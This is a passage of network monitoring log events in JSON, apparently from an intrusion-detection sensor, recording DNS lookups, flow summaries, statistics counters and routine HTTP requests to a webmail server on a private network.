{"timestamp":"2020-02-29T00:20:28.000592+0000","flow_id":816909979187263,"event_type":"flow","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:27.489535+0000","end":"2020-02-29T00:15:27.598059+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:31.635589+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23772,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:31.841937+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26439,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.872860+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:31.892012+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:20:34.000209+0000","event_type":"stats","stats":{"uptime":14886,"capture":{"kernel_packets":137355,"kernel_drops":0},"decoder":{"pkts":137371,"bytes":94199869,"invalid":193,"ipv4":135824,"ipv6":10,"ethernet":137371,"raw":0,"null":0,"sll":0,"tcp":130328,"udp":5288,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2837,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2853,"synack":2844,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1872,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2421,"failed_udp":112},"tx":{"http":4800,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2503}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20171,"memcap_state":0,"memcap_global":0},"http":{"memuse":75698,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:36.893668+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52934,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.164889+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51815,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:39.420033+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.441359+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416}} {"timestamp":"2020-02-29T00:20:41.000209+0000","event_type":"stats","stats":{"uptime":14893,"capture":{"kernel_packets":137381,"kernel_drops":0},"decoder":{"pkts":137395,"bytes":94208142,"invalid":193,"ipv4":135848,"ipv6":10,"ethernet":137395,"raw":0,"null":0,"sll":0,"tcp":130350,"udp":5290,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2838,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2854,"synack":2845,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1873,"ftp
":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2422,"failed_udp":112},"tx":{"http":4801,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2504}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":75756,"memcap":0}}} {"timestamp":"2020-02-29T00:20:41.470817+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63665,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:41.735561+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417}} {"timestamp":"2020-02-29T00:20:43.000190+0000","flow_id":708895863071501,"event_type":"flow","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1838,"bytes_toclient":6314,"start":"2020-02-29T00:19:37.451341+0000","end":"2020-02-29T00:19:42.475356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000412+0000","flow_id":1590540979789703,"event_type":"flow","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1283,"bytes_toclient":2382,"start":"2020-02-29T00:19:37.450439+0000","end":"2020-02-29T00:19:42.475231+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000708+0000","flow_id":1179362285679512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":14,"bytes_toserver":1678,"bytes_toclient":13124,"start":"2020-02-29T00:19:37.291736+0000","end":"2020-02-29T00:19:42.475450+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:43.000952+0000","flow_id":1498976572011859,"event_type":"flow","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":752,"bytes_toclient":1678,"start":"2020-02-29T00:19:37.456019+0000","end":"2020-02-29T00:19:42.466796+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.001168+0000","flow_id":2243994484072541,"event_type":"flow","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":40,"bytes_toserver":3529,"bytes_toclient":50594,"start":"2020-02-29T00:19:37.450653+0000","end":"2020-02-29T00:19:42.622817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:44.442565+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52936,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} 
{"timestamp":"2020-02-29T00:20:45.000733+0000","flow_id":1508751902266416,"event_type":"flow","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:44.873520+0000","end":"2020-02-29T00:15:44.982402+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:46.736224+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34896,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:20:47.794898+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49707,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:47.972110+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380}} {"timestamp":"2020-02-29T00:20:48.000201+0000","event_type":"stats","stats":{"uptime":14900,"capture":{"kernel_packets":137420,"kernel_drops":0},"decoder":{"pkts":137421,"bytes":94218240,"invalid":193,"ipv4":135872,"ipv6":10,"ethernet":137421,"raw":0,"null":0,"sll":0,"tcp":130370,"udp":5294,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2839,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2855,"synack":2846,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_
layer":{"flow":{"http":1874,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2423,"failed_udp":113},"tx":{"http":4802,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2505}},"flow_mgr":{"closed_pruned":2811,"new_pruned":17,"est_pruned":2476,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":105095,"memcap":0}}} {"timestamp":"2020-02-29T00:20:48.252101+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":0}} {"timestamp":"2020-02-29T00:20:48.266257+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54605,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:48.443639+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:20:48.443663+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968}} 
{"timestamp":"2020-02-29T00:20:51.001279+0000","flow_id":1337670470361580,"event_type":"flow","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:50.221676+0000","end":"2020-02-29T00:15:50.330124+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000335+0000","flow_id":737255532685455,"event_type":"flow","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":23,"bytes_toserver":4481,"bytes_toclient":19168,"start":"2020-02-29T00:19:46.616591+0000","end":"2020-02-29T00:19:52.947214+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.000827+0000","flow_id":1877711068348992,"event_type":"flow","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:52.475712+0000","end":"2020-02-29T00:15:52.580812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:20:53.000963+0000","flow_id":1479997112177472,"event_type":"flow","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1895,"bytes_toclient":4685,"start":"2020-02-29T00:19:47.906048+0000","end":"2020-02-29T00:19:52.945156+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.001091+0000","flow_id":217650389304327,"event_type":"flow","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":2315,"bytes_toclient":3905,"start":"2020-02-29T00:19:47.902151+0000","end":"2020-02-29T00:19:52.945077+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.002294+0000","flow_id":1813814855284147,"event_type":"flow","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":13,"bytes_toserver":3894,"bytes_toclient":7440,"start":"2020-02-29T00:19:47.865715+0000","end":"2020-02-29T00:19:52.945234+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:53.445189+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2505,"tx_id":1}} {"timestamp":"2020-02-29T00:20:54.000194+0000","flow_id":1702579497324555,"event_type":"flow","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":17,"bytes_toserver":3120,"bytes_toclient":17124,"start":"2020-02-29T00:19:47.905227+0000","end":"2020-02-29T00:19:53.135539+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:54.001106+0000","flow_id":1347789426886640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":2079,"bytes_toclient":5519,"start":"2020-02-29T00:19:17.296944+0000","end":"2020-02-29T00:19:53.109237+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
